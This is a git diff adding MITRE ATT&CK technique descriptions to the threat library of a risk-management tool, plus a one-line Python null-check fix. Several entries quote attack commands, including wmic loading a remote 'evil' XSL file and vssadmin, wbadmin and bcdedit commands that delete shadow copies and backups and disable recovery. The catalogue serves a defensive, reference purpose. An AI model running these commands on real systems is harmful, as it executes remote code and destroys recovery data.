+      For example, `powercfg` controls all configurable power system settings on a
+      Windows system and can be abused to prevent an infected host from locking or
+      shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android
+      Users) Adversaries may also extend system lock screen timeout settings.(Citation:
+      BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as
+      disk and hibernate timeout, can be similarly abused to keep the infected machine
+      running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware
+      Loader Campaign)
+
+
+      Aware that some malware cannot survive system reboots, adversaries may entirely
+      delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)
+
+      https://attack.mitre.org/techniques/T1653'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1484
+    name: T1484 - Domain Policy Modification
+    provider: MITRE ATT&CK
+    description: 'Adversaries may modify the configuration settings of a domain to
+      evade defenses and/or escalate privileges in domain environments. Domains provide
+      a centralized means of managing how computer resources (ex: computers, user
+      accounts) can act, and interact with each other, on a network. The policy of
+      the domain also includes configuration settings that may apply between domains
+      in a multi-domain/forest environment. Modifications to domain settings may include
+      altering domain Group Policy Objects (GPOs) or changing trust settings for domains,
+      including federation trusts.
+
+
+      With sufficient permissions, adversaries can modify domain policy settings.
+      Since domain configuration settings control many of the interactions within
+      the Active Directory (AD) environment, there are a great number of potential
+      attacks that can stem from this abuse. Examples of such abuse include modifying
+      GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)
+      to computers throughout the domain environment(Citation: ADSecurity GPO Persistence
+      2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)
+      or modifying domain trusts to include an adversary controlled domain where they
+      can control access tokens that will subsequently be accepted by victim domain
+      resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber
+      Attacks) Adversaries can also change configuration settings within the AD environment
+      to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
+
+
+      Adversaries may temporarily modify domain policy, carry out a malicious action(s),
+      and then revert the change to remove suspicious indicators.
+
+      https://attack.mitre.org/techniques/T1484'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1220
+    name: T1220 - XSL Script Processing
+    provider: MITRE ATT&CK
+    description: "Adversaries may bypass application control and obscure execution\
+      \ of code by embedding scripts inside XSL files. Extensible Stylesheet Language\
+      \ (XSL) files are commonly used to describe the processing and rendering of\
+      \ data within XML files. To support complex operations, the XSL standard includes\
+      \ support for embedded scripting in various languages. (Citation: Microsoft\
+      \ XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute\
+      \ arbitrary files while potentially bypassing application control. Similar to\
+      \ [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127),\
+      \ the Microsoft common line transformation utility binary (msxsl.exe) (Citation:\
+      \ Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript\
+      \ embedded within local or remote (URL referenced) XSL files. (Citation: Penetration\
+      \ Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default,\
+      \ an adversary will likely need to package it with dropped files. (Citation:\
+      \ Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an\
+      \ XML source file and an XSL stylesheet. Since the XSL file is valid XML, the\
+      \ adversary may call the same XSL file twice. When using msxsl.exe adversaries\
+      \ may also give the XML/XSL files an arbitrary file extension.(Citation: XSL\
+      \ Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab\
+      \ MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* <code>msxsl.exe customers[.]xml\
+      \ script[.]xsl</code>\n* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n\
+      * <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n\nAnother variation of\
+      \ this technique, dubbed \u201CSquiblytwo\u201D, involves using [Windows Management\
+      \ Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript\
+      \ or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can\
+      \ also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/\
+      \ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries\
+      \ may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)\
+      \ provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\
+      \nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\
+      \n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote\
+      \ File: <code>wmic os get /FORMAT:\u201Dhttps[:]//example[.]com/evil[.]xsl\u201D\
+      </code>\nhttps://attack.mitre.org/techniques/T1220"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1587
+    name: T1587 - Develop Capabilities
+    provider: MITRE ATT&CK
+    description: 'Adversaries may build capabilities that can be used during targeting.
+      Rather than purchasing, freely downloading, or stealing capabilities, adversaries
+      may develop their own capabilities in-house. This is the process of identifying
+      development requirements and building solutions such as malware, exploits, and
+      self-signed certificates. Adversaries may develop capabilities to support their
+      operations throughout numerous phases of the adversary lifecycle.(Citation:
+      Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity
+      June 2020)(Citation: Talos Promethium June 2020)
+
+
+      As with legitimate development efforts, different skill sets may be required
+      for developing capabilities. The skills needed may be located in-house, or may
+      need to be contracted out. Use of a contractor may be considered an extension
+      of that adversary''s development capabilities, provided the adversary plays
+      a role in shaping requirements and maintains a degree of exclusivity to the
+      capability.
+
+      https://attack.mitre.org/techniques/T1587'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1008
+    name: T1008 - Fallback Channels
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use fallback or alternate communication channels
+      if the primary channel is compromised or inaccessible in order to maintain reliable
+      command and control and to avoid data transfer thresholds.
+
+      https://attack.mitre.org/techniques/T1008'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1124
+    name: T1124 - System Time Discovery
+    provider: MITRE ATT&CK
+    description: 'An adversary may gather the system time and/or time zone from a
+      local or remote system. The system time is set and stored by the Windows Time
+      Service within a domain to maintain time synchronization between systems and
+      services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet
+      Windows Time Service)
+
+
+      System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039)
+      on Windows by performing <code>net time \\hostname</code> to gather the system
+      time on a remote system. The victim''s time zone may also be inferred from the
+      current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet
+      Windows Time Service)
+
+
+      On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      commands such as `show clock detail` can be used to see the current time configuration.(Citation:
+      show_clock_detail_cisco_cmd)
+
+
+      This information could be useful for performing other techniques, such as executing
+      a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation:
+      RSA EU12 They''re Inside), or to discover locality information based on time
+      zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)).
+      Adversaries may also use knowledge of system time as part of a time bomb, or
+      delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
+
+      https://attack.mitre.org/techniques/T1124'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1556
+    name: T1556 - Modify Authentication Process
+    provider: MITRE ATT&CK
+    description: 'Adversaries may modify authentication mechanisms and processes to
+      access user credentials or enable otherwise unwarranted access to accounts.
+      The authentication process is handled by mechanisms, such as the Local Security
+      Authentication Server (LSASS) process and the Security Accounts Manager (SAM)
+      on Windows, pluggable authentication modules (PAM) on Unix-based systems, and
+      authorization plugins on MacOS systems, responsible for gathering, storing,
+      and validating credentials. By modifying an authentication process, an adversary
+      may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
+
+
+      Adversaries may maliciously modify a part of this process to either reveal credentials
+      or bypass authentication mechanisms. Compromised credentials or access may be
+      used to bypass access controls placed on various resources on systems within
+      the network and may even be used for persistent access to remote systems and
+      externally available services, such as VPNs, Outlook Web Access and remote desktop.
+
+      https://attack.mitre.org/techniques/T1556'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1495
+    name: T1495 - Firmware Corruption
+    provider: MITRE ATT&CK
+    description: 'Adversaries may overwrite or corrupt the flash memory contents of
+      system BIOS or other firmware in devices attached to a system in order to render
+      them inoperable or unable to boot, thus denying the availability to use the
+      devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is
+      software that is loaded and executed from non-volatile memory on hardware devices
+      in order to initialize and manage device functionality. These devices may include
+      the motherboard, hard drive, or video cards.
+
+
+      In general, adversaries may manipulate, overwrite, or corrupt firmware in order
+      to deny the use of the system or devices. For example, corruption of firmware
+      responsible for loading the operating system for network devices may render
+      the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation:
+      cisa_malware_orgs_ukraine) Depending on the device, this attack may also result
+      in [Data Destruction](https://attack.mitre.org/techniques/T1485).
+
+      https://attack.mitre.org/techniques/T1495'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1490
+    name: T1490 - Inhibit System Recovery
+    provider: MITRE ATT&CK
+    description: "Adversaries may delete or remove built-in data and turn off services\
+      \ designed to aid in the recovery of a corrupted system to prevent recovery.(Citation:\
+      \ Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny\
+      \ access to available backups and recovery options.\n\nOperating systems may\
+      \ contain features that can help fix corrupted systems, such as a backup catalog,\
+      \ volume shadow copies, and automatic repair features. Adversaries may disable\
+      \ or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485)\
+      \ and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation:\
+      \ Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore,\
+      \ adversaries may disable recovery notifications, then corrupt backups.(Citation:\
+      \ disable_notif_synology_ransom)\n\nA number of native Windows utilities have\
+      \ been used by adversaries to disable or delete system recovery features:\n\n\
+      * <code>vssadmin.exe</code> can be used to delete all volume shadow copies on\
+      \ a system - <code>vssadmin.exe delete shadows /all /quiet</code>\n* [Windows\
+      \ Management Instrumentation](https://attack.mitre.org/techniques/T1047) can\
+      \ be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n\
+      * <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog\
+      \ - <code>wbadmin.exe delete catalog -quiet</code>\n* <code>bcdedit.exe</code>\
+      \ can be used to disable automatic Windows recovery features by modifying boot\
+      \ configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\
+      \ & bcdedit /set {default} recoveryenabled no</code>\n* <code>REAgentC.exe</code>\
+      \ can be used to disable Windows Recovery Environment (WinRE) repair/recovery\
+      \ options of an infected system\n\nOn network devices, adversaries may leverage\
+      \ [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware\
+      \ images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529)\
+      \ to reload the device. Together this activity may leave network devices completely\
+      \ inoperable and inhibit recovery operations.\n\nAdversaries may also delete\
+      \ \u201Conline\u201D backups that are connected to their network \u2013 whether\
+      \ via network storage media or through folders that sync to cloud services.(Citation:\
+      \ ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable\
+      \ versioning and backup policies and delete snapshots, machine images, and prior\
+      \ versions of objects designed to be used in disaster recovery scenarios.(Citation:\
+      \ Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3\
+      \ Ransomware)\nhttps://attack.mitre.org/techniques/T1490"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1216
+    name: T1216 - System Script Proxy Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use trusted scripts, often signed with certificates,
+      to proxy the execution of malicious files. Several Microsoft signed scripts
+      that have been downloaded from Microsoft or are default on Windows installations
+      can be used to proxy execution of other files.(Citation: LOLBAS Project) This
+      behavior may be abused by adversaries to execute malicious files that could
+      bypass application control and signature validation on systems.(Citation: GitHub
+      Ultimate AppLocker Bypass List)
+
+      https://attack.mitre.org/techniques/T1216'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1211
+    name: T1211 - Exploitation for Defense Evasion
+    provider: MITRE ATT&CK
+    description: "Adversaries may exploit a system or application vulnerability to\
+      \ bypass security features. Exploitation of a vulnerability occurs when an adversary\
+      \ takes advantage of a programming error in a program, service, or within the\
+      \ operating system software or kernel itself to execute adversary-controlled\
+      \ code.\_Vulnerabilities may exist in defensive security software that can be\
+      \ used to disable or circumvent them.\n\nAdversaries may have prior knowledge\
+      \ through reconnaissance that security software exists within an environment\
+      \ or they may perform checks during or shortly after the system is compromised\
+      \ for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001).\
+      \ The security software will likely be targeted directly for exploitation. There\
+      \ are examples of antivirus software being targeted by persistent threat groups\
+      \ to avoid detection.\n\nThere have also been examples of vulnerabilities in\
+      \ public cloud infrastructure of SaaS applications that may bypass defense boundaries\
+      \ (Citation: Salesforce zero-day in facebook phishing attack), evade security\
+      \ logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden\
+      \ infrastructure.(Citation: GhostToken GCP flaw)\nhttps://attack.mitre.org/techniques/T1211"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1127
+    name: T1127 - Trusted Developer Utilities Proxy Execution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may take advantage of trusted developer utilities to
+      proxy execution of malicious payloads. There are many utilities used for software
+      development related tasks that can be used to execute code in various forms
+      to assist in development, debugging, and reverse engineering.(Citation: engima0x3
+      DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation:
+      LOLBAS Tracker) These utilities may often be signed with legitimate certificates
+      that allow them to execute on a system and proxy execution of malicious code
+      through a trusted process that effectively bypasses application control solutions.
+
+      https://attack.mitre.org/techniques/T1127'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1529
+    name: T1529 - System Shutdown/Reboot
+    provider: MITRE ATT&CK
+    description: 'Adversaries may shutdown/reboot systems to interrupt access to,
+      or aid in the destruction of, those systems. Operating systems may contain commands
+      to initiate a shutdown/reboot of a machine or network device. In some cases,
+      these commands may also be used to initiate a shutdown/reboot of a remote computer
+      or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation:
+      alert_TA18_106A)
+
+
+      Shutting down or rebooting systems may disrupt access to computer resources
+      for legitimate users while also impeding incident response/recovery.
+
+
+      Adversaries may attempt to shutdown/reboot a system after impacting it in other
+      ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002)
+      or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to
+      hasten the intended effects on system availability.(Citation: Talos Nyetya June
+      2017)(Citation: Talos Olympic Destroyer 2018)
+
+      https://attack.mitre.org/techniques/T1529'
+    version: '1.0'
diff --git a/library/views.py b/library/views.py
index 4d013c2..d7c32d0 100644
--- a/library/views.py
+++ b/library/views.py
@@ -29,7 +29,7 @@ class LibraryListView(BaseContextMixin, FormView):
     def get_queryset(self):
         qs = get_available_libraries()
         for lib in qs:
-            lib['requirements'] = len(lib['objects'].get('framework').get('requirements')) if lib['objects'].get('framework').get('requirements') else 0
+            lib['requirements'] = len(lib['objects'].get('framework').get('requirements')) if lib['objects'].get('framework') else 0
             lib['threats'] = len(lib['objects'].get('threats')) if lib['objects'].get('threats') else 0
             lib['security_functions'] = len(lib['objects'].get('security_functions')) if lib['objects'].get('security_functions') else 0
             lib['objects'].clear()